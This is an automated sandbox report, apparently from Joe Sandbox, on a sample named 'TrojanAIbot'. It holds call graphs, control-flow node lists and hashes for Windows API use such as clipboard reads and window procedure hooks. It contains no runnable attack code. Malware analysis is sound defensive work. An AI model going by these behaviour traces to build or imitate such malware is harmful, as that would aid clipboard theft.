API calls 29861->29862 29861->29863 29862->29863 29864 65e6890 7 API calls 29863->29864 29865 65e816c 29863->29865 29864->29865 29866 65ec548 29869 65ec340 29866->29869 29868 65ec556 29870 65ec341 29869->29870 29871 65ec34b 29870->29871 29876 65ec2df 29870->29876 29881 65ec370 29870->29881 29888 65ec36f 29870->29888 29871->29868 29872 65ec358 29872->29868 29877 65ec35f 29876->29877 29880 65ec2ea 29876->29880 29878 65ec3c8 29877->29878 29895 65e5980 29877->29895 29878->29872 29880->29872 29882 65ec37e 29881->29882 29883 65ec3a0 29881->29883 29884 65ec38c 29882->29884 29886 65e5980 3 API calls 29882->29886 29885 65e5980 3 API calls 29883->29885 29884->29872 29887 65ec3a7 29885->29887 29886->29884 29887->29872 29889 65ec37e 29888->29889 29890 65ec3a0 29888->29890 29892 65e5980 3 API calls 29889->29892 29893 65ec38c 29889->29893 29891 65e5980 3 API calls 29890->29891 29894 65ec3a7 29891->29894 29892->29893 29893->29872 29894->29872 29897 65e59cc 29895->29897 29896 65e5a1d 29896->29878 29897->29896 29900 65ec3d0 29897->29900 29904 65ec3e0 29897->29904 29901 65ec426 29900->29901 29903 65ec449 29901->29903 29908 65e1c94 29901->29908 29903->29896 29905 65ec426 29904->29905 29906 65e1c94 3 API calls 29905->29906 29907 65ec449 29905->29907 29906->29907 29907->29896 29909 65e1c9f 29908->29909 29910 65e669c 29909->29910 29911 65e65f2 29909->29911 29915 65e1b6c 29910->29915 29913 65e664a CallWindowProcW 29911->29913 29914 65e65f9 29911->29914 29913->29914 29914->29903 29916 65e1b77 29915->29916 29917 65e4de9 29916->29917 29919 65e4dd9 29916->29919 29918 65e1c94 3 API calls 29917->29918 29920 65e4de7 29917->29920 29918->29920 29923 65e4f10 29919->29923 29928 65e4f00 29919->29928 29924 65e4f24 29923->29924 29934 65e4fc8 29924->29934 29939 65e4fc7 29924->29939 29925 65e4fb0 29925->29920 29929 65e4ee7 29928->29929 29931 65e4f0e 29928->29931 29929->29920 29930 65e4fb0 29930->29920 29932 65e4fc8 3 API calls 29931->29932 29933 65e4fc7 3 API calls 29931->29933 29932->29930 29933->29930 29935 65e4fd9 29934->29935 29944 65e64c4 29934->29944 29954 65eba30 29934->29954 29961 65eba40 29934->29961 29935->29925 29940 65e4fd9 29939->29940 29941 65e64c4 3 API calls 29939->29941 29942 65eba40 3 API calls 29939->29942 29943 65eba30 3 API calls 29939->29943 29940->29925 29941->29940 29942->29940 29943->29940 29945 65e64ce 29944->29945 29946 65e1c94 2 API calls 29945->29946 29947 65e6531 29945->29947 29948 65e6596 29946->29948 29947->29935 29948->29935 29949 65e669c 29948->29949 29950 65e65f2 29948->29950 29951 65e1b6c 2 API calls 29949->29951 29952 65e664a CallWindowProcW 29950->29952 29953 65e65f9 29950->29953 29951->29953 29952->29953 29953->29935 29955 65eba35 29954->29955 29968 65ebd40 29955->29968 29956 65ebad8 29957 65ebafe 29956->29957 29973 6664198 29956->29973 29979 6664189 29956->29979 29957->29935 29962 65eba73 29961->29962 29967 65ebd40 3 API calls 29962->29967 29963 65ebad8 29964 65ebafe 29963->29964 29965 6664198 OleGetClipboard 29963->29965 29966 6664189 OleGetClipboard 29963->29966 29964->29935 29965->29964 29966->29964 29967->29963 29969 65ebd4b 29968->29969 29970 65ebeb6 29969->29970 29971 65ec33a CallWindowProcW CallWindowProcW OleGetClipboard 29969->29971 29972 65ec340 CallWindowProcW CallWindowProcW OleGetClipboard 29969->29972 29970->29956 29971->29970 29972->29970 29975 66641a0 29973->29975 29974 66641b3 29974->29957 29975->29974 29977 66645e0 OleGetClipboard 29975->29977 29978 66645d1 OleGetClipboard 29975->29978 29976 66641c9 29976->29957 29977->29976 29978->29976 29980 666414b 29979->29980 29982 6664192 29979->29982 29980->29957 29981 66641b3 29981->29957 29982->29981 29984 66645e0 OleGetClipboard 29982->29984 29985 66645d1 OleGetClipboard 29982->29985 29983 66641c9 29983->29957 29984->29983 29985->29983 29986 65ee108 29987 65ee119 29986->29987 29990 65ee183 29987->29990 29991 65edaac 29987->29991 29992 65edab7 29991->29992 29993 65ee17c 29992->29993 29996 65ef898 29992->29996 30002 65ef8a8 29992->30002 30008 65ee41c 29996->30008 29998 65ef8cf 29998->29993 30000 65ef8f6 CreateIconFromResourceEx 30001 65ef976 30000->30001 30001->29993 30003 65ee41c CreateIconFromResourceEx 30002->30003 30004 65ef8bf 30003->30004 30005 65ef8cf 30004->30005 30006 65ef8f6 CreateIconFromResourceEx 30004->30006 30005->29993 30007 65ef976 30006->30007 30007->29993 30009 65ef8f8 CreateIconFromResourceEx 30008->30009 30010 65ef8bf 30009->30010 30010->29998 30010->30000 30011 65e9108 30012 65e911f 30011->30012 30014 65e8cd8 30011->30014 30015 65e8ce3 30014->30015 30016 65e91d8 30015->30016 30020 65e91f8 30015->30020 30025 65e91e9 30015->30025 30016->30012 30017 65e91a2 30017->30012 30021 65e91fe 30020->30021 30023 65e943d 30021->30023 30030 65e9659 30021->30030 30023->30017 30027 65e91f6 30025->30027 30026 65e9473 30026->30017 30028 65e943d 30027->30028 30029 65e9659 7 API calls 30027->30029 30028->30017 30029->30026 30031 65e9668 30030->30031 30032 65e6890 7 API calls 30031->30032 30033 65e971e 30031->30033 30032->30033 30165 65ed528 30166 65ed56a 30165->30166 30167 65ed570 SetWindowTextW 30165->30167 30166->30167 30168 65ed5a1 30167->30168 30169 65e03e8 30171 65e0410 30169->30171 30170 65e0438 30171->30170 30174 65e0498 30171->30174 30181 65e0480 30171->30181 30175 65e04a7 30174->30175 30188 65e15b0 30175->30188 30194 65e15a0 30175->30194 30176 65e04d0 30180 65e2208 7 API calls 30176->30180 30177 65e04e1 30177->30170 30180->30177 30182 65e04a7 30181->30182 30186 65e15b0 3 API calls 30182->30186 30187 65e15a0 3 API calls 30182->30187 30183 65e04d0 30185 65e2208 7 API calls 30183->30185 30184 65e04e1 30184->30170 30185->30184 30186->30183 30187->30183 30190 65e15b1 30188->30190 30189 65e161c 30189->30176 30191 65e1621 30190->30191 30192 65e16c0 2 API calls 30190->30192 30193 65e16b0 2 API calls 30190->30193 30191->30176 30192->30189 30193->30189 30195 65e15b0 30194->30195 30197 65e1621 30195->30197 30198 65e16c0 2 API calls 30195->30198 30199 65e16b0 2 API calls 30195->30199 30196 65e161c 30196->30176 30197->30176 30198->30196 30199->30196 30034 15af6c0 30035 15af706 GetCurrentProcess 30034->30035 30037 15af758 GetCurrentThread 30035->30037 30038 15af751 30035->30038 30039 15af795 GetCurrentProcess 30037->30039 30040 15af78e 30037->30040 30038->30037 30041 15af7cb 30039->30041 30040->30039 30042 15af7f3 GetCurrentThreadId 30041->30042 30043 15af824 30042->30043 30044 142d01c 30045 142d034 30044->30045 30046 142d08e 30045->30046 30047 65e1b6c 3 API calls 30045->30047 30054 65e1b5c 30045->30054 30058 65e4150 30045->30058 30062 65e4017 30045->30062 30068 65e4d79 30045->30068 30076 65e1b48 30045->30076 30080 65e4028 30045->30080 30047->30046 30055 65e1b67 30054->30055 30086 65e1b94 30055->30086 30057 65e4167 30057->30046 30059 65e4160 30058->30059 30060 65e1b94 SetWindowLongW 30059->30060 30061 65e4167 30060->30061 30061->30046 30063 65e404e 30062->30063 30064 65e1b5c SetWindowLongW 30063->30064 30065 65e405a 30064->30065 30066 65e1b6c 3 API calls 30065->30066 30067 65e406f 30066->30067 30067->30046 30071 65e4db5 30068->30071 30069 65e4de9 30070 65e1c94 3 API calls 30069->30070 30073 65e4de7 30069->30073 30070->30073 30071->30069 30072 65e4dd9 30071->30072 30074 65e4f10 3 API calls 30072->30074 30075 65e4f00 3 API calls 30072->30075 30074->30073 30075->30073 30077 65e1b55 30076->30077 30078 65e1b94 SetWindowLongW 30077->30078 30079 65e4167 30078->30079 30079->30046 30081 65e404e 30080->30081 30082 65e1b5c SetWindowLongW 30081->30082 30083 65e405a 30082->30083 30084 65e1b6c 3 API calls 30083->30084 30085 65e406f 30084->30085 30085->30046 30088 65e1b9f 30086->30088 30087 65e43f6 30088->30087 30089 65e4088 SetWindowLongW 30088->30089 30089->30087

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 868 6663360-66633c3 869 66633c5-66633ef 868->869 870 66633f2-6663410 868->870 869->870 875 6663412-6663414 870->875 876 6663419-6663450 870->876 878 66638d2-66638e7 875->878 880 6663456-666346a 876->880 881 6663881 876->881 882 666346c-6663496 880->882 883 6663499-66634b8 880->883 884 6663886-666389c 881->884 882->883 890 66634d0-66634d2 883->890 891 66634ba-66634c0 883->891 884->878 895 66634d4-66634ec 890->895 896 66634f1-66634fa 890->896 893 66634c4-66634c6 891->893 894 66634c2 891->894 893->890 894->890 895->884 897 6663502-6663509 896->897 898 6663513-666351a 897->898 899 666350b-6663511 897->899 901 6663524 898->901 902 666351c-6663522 898->902 900 6663527-6663544 call 6662210 899->900 905 666354a-6663551 900->905 906 6663699-666369d 900->906 901->900 902->900 905->881 907 6663557-6663594 905->907 908 66636a3-66636a7 906->908 909 666386c-666387f 906->909 917 6663862-6663866 907->917 918 666359a-666359f 907->918 910 66636c1-66636ca 908->910 911 66636a9-66636bc 908->911 909->884 912 66636cc-66636f6 910->912 913 66636f9-6663700 910->913 911->884 912->913 915 6663706-666370d 913->915 916 666379f-66637b4 913->916 920 666370f-6663739 915->920 921 666373c-666375e 915->921 916->917 930 66637ba-66637bc 916->930 917->897 917->909 922 66635d1-66635e6 call 6662234 918->922 923 66635a1-66635af call 666221c 918->923 920->921 921->916 958 6663760-666376a 921->958 928 66635eb-66635ef 922->928 923->922 933 66635b1-66635cf call 6662228 923->933 934 6663660-666366d 928->934 935 66635f1-6663603 call 6662240 928->935 936 66637be-66637f7 930->936 937 6663809-6663826 call 6662210 930->937 933->928 934->917 950 6663673-666367d call 6662250 934->950 961 6663605-6663635 935->961 962 6663643-666365b 935->962 953 6663800-6663807 936->953 954 66637f9-66637ff 936->954 937->917 949 6663828-6663854 WaitMessage 937->949 955 6663856 949->955 956 666385b 949->956 964 666367f-6663682 call 666225c 950->964 965 666368c-6663694 call 6662268 950->965 953->917 954->953 955->956 956->917 969 6663782-666379d 958->969 970 666376c-6663772 958->970 976 6663637 961->976 977 666363c 961->977 962->884 972 6663687 964->972 965->917 969->916 969->958 974 6663776-6663778 970->974 975 6663774 970->975 972->917 974->969 975->969 976->977 977->962
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DispatchMessage
                                                                                                              • String ID:
                                                                                                              • API String ID: 2061451462-0
                                                                                                              • Opcode ID: d5dd825988a65975765090273862b8c41b1bf1e5deab51d7b1af3a0bba060700
                                                                                                              • Instruction ID: 2a19c54852c5594ec688a4cea8be5833e692f0e35114aabed3911fdc75ccb4e4
                                                                                                              • Opcode Fuzzy Hash: d5dd825988a65975765090273862b8c41b1bf1e5deab51d7b1af3a0bba060700
                                                                                                              • Instruction Fuzzy Hash: 17F17B70E00209DFEB54DFAAD948B9DBBF1BF88314F158169E405AB3A5DB70E945CB80

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 739 15af6c0-15af74f GetCurrentProcess 743 15af758-15af78c GetCurrentThread 739->743 744 15af751-15af757 739->744 745 15af78e-15af794 743->745 746 15af795-15af7c9 GetCurrentProcess 743->746 744->743 745->746 747 15af7cb-15af7d1 746->747 748 15af7d2-15af7ed call 15afc98 746->748 747->748 752 15af7f3-15af822 GetCurrentThreadId 748->752 753 15af82b-15af88d 752->753 754 15af824-15af82a 752->754 754->753
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 015AF73E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 015AF77B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 015AF7B8
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 015AF811
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 7b7abc2870361cc1af2b3f3a0829640c9eccd39db3a8d197ae9f94b6b2d77230
                                                                                                              • Instruction ID: ab40344fd38e84e482ba43579ea7b85e4d787421d1fec1ca77dc2fb7b0647def
                                                                                                              • Opcode Fuzzy Hash: 7b7abc2870361cc1af2b3f3a0829640c9eccd39db3a8d197ae9f94b6b2d77230
                                                                                                              • Instruction Fuzzy Hash: E25165B090030A8FDB18CFAAD548BAEBFF1FB49314F24845AE119AB360D7746944CF65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 717 15af6bc-15af74f GetCurrentProcess 721 15af758-15af78c GetCurrentThread 717->721 722 15af751-15af757 717->722 723 15af78e-15af794 721->723 724 15af795-15af7c9 GetCurrentProcess 721->724 722->721 723->724 725 15af7cb-15af7d1 724->725 726 15af7d2-15af7ed call 15afc98 724->726 725->726 730 15af7f3-15af822 GetCurrentThreadId 726->730 731 15af82b-15af88d 730->731 732 15af824-15af82a 730->732 732->731
                                                                                                              APIs
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 015AF73E
                                                                                                              • GetCurrentThread.KERNEL32 ref: 015AF77B
                                                                                                              • GetCurrentProcess.KERNEL32 ref: 015AF7B8
                                                                                                              • GetCurrentThreadId.KERNEL32 ref: 015AF811
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Current$ProcessThread
                                                                                                              • String ID:
                                                                                                              • API String ID: 2063062207-0
                                                                                                              • Opcode ID: 19a8e24c27359dda79e496ff6a1cbeb71c78232d2101a7fcf161e1772900bdae
                                                                                                              • Instruction ID: 834c8ee0eace23865e737ff58897d0323348f925c7d3e21e92bfd8b0dc010aff
                                                                                                              • Opcode Fuzzy Hash: 19a8e24c27359dda79e496ff6a1cbeb71c78232d2101a7fcf161e1772900bdae
                                                                                                              • Instruction Fuzzy Hash: D75164B4D0030A8FEB18CFA9D548BAEBBF1FB49314F24845AE119AB360D7745944CF65

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 761 65e16c0-65e16d9 763 65e16df-65e16e3 761->763 764 65e175c-65e175f 761->764 765 65e16e5-65e16ff 763->765 766 65e1760-65e17b6 763->766 771 65e1713-65e1735 765->771 772 65e1701-65e1708 765->772 783 65e17b8 766->783 784 65e17b9-65e17ce 766->784 779 65e173c-65e173e 771->779 772->771 774 65e170a-65e170c 772->774 774->771 780 65e1755 779->780 781 65e1740-65e174c 779->781 780->764 781->780 786 65e174e 781->786 783->784 788 65e1888-65e188d 784->788 789 65e17d4-65e17fa 784->789 786->780 793 65e17fc-65e1807 789->793 794 65e180a-65e180f 789->794 793->794 795 65e1818-65e1820 794->795 796 65e1811 794->796 797 65e1845-65e187e KiUserCallbackDispatcher 795->797 798 65e1822-65e183b 795->798 802 65e1813 call 6660ad8 796->802 803 65e1813 call 6660ac9 796->803 804 65e1883 call 6660eb0 797->804 805 65e1883 call 6660ea1 797->805 798->797 802->795 803->795 804->788 805->788
                                                                                                              APIs
                                                                                                              • KiUserCallbackDispatcher.NTDLL(00000037,00000000,00000000,04234164,032DEE38,?,00000000,?,00000000,00000000), ref: 065E1877
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                              • String ID: Hq
                                                                                                              • API String ID: 2492992576-1594803414
                                                                                                              • Opcode ID: 2f48be1fadb43bd4e52a7273e8d8a265e1fdada0d8ef60396b67d10bb906474b
                                                                                                              • Instruction ID: da2ca2a167392d42c85294bcffe480ba38ae0747884ee9bc843bfd4c41f820c2
                                                                                                              • Opcode Fuzzy Hash: 2f48be1fadb43bd4e52a7273e8d8a265e1fdada0d8ef60396b67d10bb906474b
                                                                                                              • Instruction Fuzzy Hash: B8516D34744A128FDB68EB29D454B2E77E6BFC5A10F55806AE406CB3A1CF74DC42CB91

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 980 15ad418-15ad426 981 15ad428 980->981 982 15ad429-15ad437 980->982 981->982 983 15ad439-15ad446 call 15ac720 982->983 984 15ad463-15ad467 982->984 991 15ad448 983->991 992 15ad45c 983->992 985 15ad47b-15ad4bc 984->985 986 15ad469-15ad473 984->986 993 15ad4c9-15ad4d7 985->993 994 15ad4be-15ad4c6 985->994 986->985 1037 15ad44e call 15ad6c0 991->1037 1038 15ad44e call 15ad6b0 991->1038 992->984 995 15ad4fb-15ad4fd 993->995 996 15ad4d9-15ad4de 993->996 994->993 999 15ad500-15ad507 995->999 1000 15ad4e9 996->1000 1001 15ad4e0-15ad4e7 call 15ac72c 996->1001 997 15ad454-15ad456 997->992 998 15ad598-15ad658 997->998 1032 15ad65a-15ad65d 998->1032 1033 15ad660-15ad68b GetModuleHandleW 998->1033 1003 15ad509-15ad511 999->1003 1004 15ad514-15ad51b 999->1004 1002 15ad4eb-15ad4f9 1000->1002 1001->1002 1002->999 1003->1004 1006 15ad528-15ad531 call 15ac73c 1004->1006 1007 15ad51d-15ad525 1004->1007 1013 15ad53e-15ad543 1006->1013 1014 15ad533-15ad53b 1006->1014 1007->1006 1015 15ad561-15ad56e 1013->1015 1016 15ad545-15ad54c 1013->1016 1014->1013 1022 15ad570-15ad58e 1015->1022 1023 15ad591-15ad597 1015->1023 1016->1015 1018 15ad54e-15ad55e call 15ac74c call 15ac75c 1016->1018 1018->1015 1022->1023 1032->1033 1034 15ad68d-15ad693 1033->1034 1035 15ad694-15ad6a8 1033->1035 1034->1035 1037->997 1038->997
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: b0de5527e6a004b9d8b587cee0f507a43f347915e876e8757528cb9e994aab6b
                                                                                                              • Instruction ID: 6198d4ae633e2860583f63057c18242afd391af78b067589bf399e00e631f59a
                                                                                                              • Opcode Fuzzy Hash: b0de5527e6a004b9d8b587cee0f507a43f347915e876e8757528cb9e994aab6b
                                                                                                              • Instruction Fuzzy Hash: 85817870A00B058FEB24DF6AD04479EBBF1FF88204F44892ED48ADBA50D775E945CB90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1039 65e3e64-65e3ed6 1040 65e3ed8-65e3ede 1039->1040 1041 65e3ee1-65e3ee8 1039->1041 1040->1041 1042 65e3eea-65e3ef0 1041->1042 1043 65e3ef3-65e3f2b 1041->1043 1042->1043 1044 65e3f33-65e3f92 CreateWindowExW 1043->1044 1045 65e3f9b-65e3fd3 1044->1045 1046 65e3f94-65e3f9a 1044->1046 1050 65e3fd5-65e3fd8 1045->1050 1051 65e3fe0 1045->1051 1046->1045 1050->1051 1052 65e3fe1 1051->1052 1052->1052
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E3F82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: 6a3c5db5c5c5437f9383be27e8f6fb8ac36dc66cc17e0ae9e948b2d25c8ec26a
                                                                                                              • Instruction ID: 6fc3e5210f8f24bd84b4a3a6c96b21f324c77de12c0a2260e895b96c8b74a89e
                                                                                                              • Opcode Fuzzy Hash: 6a3c5db5c5c5437f9383be27e8f6fb8ac36dc66cc17e0ae9e948b2d25c8ec26a
                                                                                                              • Instruction Fuzzy Hash: 0F51C0B1D103499FDF15CFAAC984ADEBBB5BF48310F24812AE819AB214D7759885CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1053 65e3e70-65e3ed6 1054 65e3ed8-65e3ede 1053->1054 1055 65e3ee1-65e3ee8 1053->1055 1054->1055 1056 65e3eea-65e3ef0 1055->1056 1057 65e3ef3-65e3f92 CreateWindowExW 1055->1057 1056->1057 1059 65e3f9b-65e3fd3 1057->1059 1060 65e3f94-65e3f9a 1057->1060 1064 65e3fd5-65e3fd8 1059->1064 1065 65e3fe0 1059->1065 1060->1059 1064->1065 1066 65e3fe1 1065->1066 1066->1066
                                                                                                              APIs
                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 065E3F82
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 716092398-0
                                                                                                              • Opcode ID: ecb524284b5e3ded8d737b4c4cd6c4c7cee3198e5a99ce63487141b65b6596c3
                                                                                                              • Instruction ID: 15c8eb0590020c689db24ef9191cbdb3b9de513816a7d0476030827cdfd1a120
                                                                                                              • Opcode Fuzzy Hash: ecb524284b5e3ded8d737b4c4cd6c4c7cee3198e5a99ce63487141b65b6596c3
                                                                                                              • Instruction Fuzzy Hash: A041C0B1D103099FDF14CF9AC984ADEFBB5BF48310F24812AE819AB210D775A885CF90

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1067 65ef8a8-65ef8bd call 65ee41c 1069 65ef8bf-65ef8cd 1067->1069 1071 65ef8cf-65ef8df call 65ef368 1069->1071 1072 65ef8e2-65ef8f4 1069->1072 1072->1069 1076 65ef8f6-65ef974 CreateIconFromResourceEx 1072->1076 1077 65ef97d-65ef99a 1076->1077 1078 65ef976-65ef97c 1076->1078 1078->1077
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateFromIconResource
                                                                                                              • String ID:
                                                                                                              • API String ID: 3668623891-0
                                                                                                              • Opcode ID: 328a6031ce38514511d5815b954a349e9087b6e6a0a00869a35fba05b6651cf4
                                                                                                              • Instruction ID: e92324996416c9f779c644809c88f8c98ae827e916265f03248a09cf66df2bbc
                                                                                                              • Opcode Fuzzy Hash: 328a6031ce38514511d5815b954a349e9087b6e6a0a00869a35fba05b6651cf4
                                                                                                              • Instruction Fuzzy Hash: 94317A729043599FDB15CFAAD800AEEBFF9FF49310F14806AE994A7261C3359854CFA1

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 1081 65e65de-65e65ec 1082 65e669c-65e66bc call 65e1b6c 1081->1082 1083 65e65f2-65e65f7 1081->1083 1090 65e66bf-65e66cc 1082->1090 1085 65e664a-65e6682 CallWindowProcW 1083->1085 1086 65e65f9-65e6630 1083->1086 1087 65e668b-65e669a 1085->1087 1088 65e6684-65e668a 1085->1088 1092 65e6639-65e6648 1086->1092 1093 65e6632-65e6638 1086->1093 1087->1090 1088->1087 1092->1090 1093->1092
                                                                                                              APIs
                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 065E6671
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3795329595.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_65e0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CallProcWindow
                                                                                                              • String ID:
                                                                                                              • API String ID: 2714655100-0
                                                                                                              • Opcode ID: 53f6d549178f69898b0cad4d9a7e74db3cdd3fe264e0ab6ee1c83250c85ea84b
                                                                                                              • Instruction ID: 1292750551a09e77a6b76cb75c3cfc3e0b646c83eaf11a69a875338234d2bde5
                                                                                                              • Opcode Fuzzy Hash: 53f6d549178f69898b0cad4d9a7e74db3cdd3fe264e0ab6ee1c83250c85ea84b
                                                                                                              • Instruction Fuzzy Hash: 983118B9A10205CFDB58CF95C448BAABBF5FF98314F28C499D5199B321D334A841CFA0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              • Opcode ID: 7ac866191ab25a9cac93f4713e22c500a5885ac6ffd9c38e7f022190e14c4230
                                                                                                              • Instruction ID: b6b0ce98c5821f0a087bc6c06feba991fc9bf191bc5a574fef8ec0c87c11e5df
                                                                                                              • Opcode Fuzzy Hash: 7ac866191ab25a9cac93f4713e22c500a5885ac6ffd9c38e7f022190e14c4230
                                                                                                              • Instruction Fuzzy Hash: AB3123B4D01349DFDB54DF99D584BDEBBF1AB48304F248029E004AB390DBB5A845CB54
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3796300493.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_6660000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Clipboard
                                                                                                              • String ID:
                                                                                                              • API String ID: 220874293-0
                                                                                                              • Opcode ID: d68c3c3897456b6c2a370c0c94387a17ce1526e9a1ff57b1b6a4a9a600fced6b
                                                                                                              • Instruction ID: 428aea79012203fe7537a770d4ef9d7f5fa0e455a5d7ff395e9035200c62f8cb
                                                                                                              • Opcode Fuzzy Hash: d68c3c3897456b6c2a370c0c94387a17ce1526e9a1ff57b1b6a4a9a600fced6b
                                                                                                              • Instruction Fuzzy Hash: 663104B0D01349EFDB54DF9AD544BDDBBF5AB48304F248059E404AB390DBB5A845CB91
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AFD97
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
                                                                                                              • Opcode ID: 8073b61562210a4e7b5a7f6a7277dc9c286b6731e285bb5b42039cf1288fca08
                                                                                                              • Instruction ID: c7bb2a126156ace99f04958ea04fb839642c4fc76bd914c8fcfcc8765503c5f1
                                                                                                              • Opcode Fuzzy Hash: 8073b61562210a4e7b5a7f6a7277dc9c286b6731e285bb5b42039cf1288fca08
                                                                                                              • Instruction Fuzzy Hash: 8B21E4B59003089FDB10CFAAD584ADEBBF8FB48310F14841AE958A7310C375A940CFA5
                                                                                                              APIs
                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 015AFD97
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000014.00000002.3781359105.00000000015A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015A0000, based on PE: false
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_20_2_15a0000_TrojanAIbot.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: DuplicateHandle
                                                                                                              • String ID:
                                                                                                              • API String ID: 3793708945-0
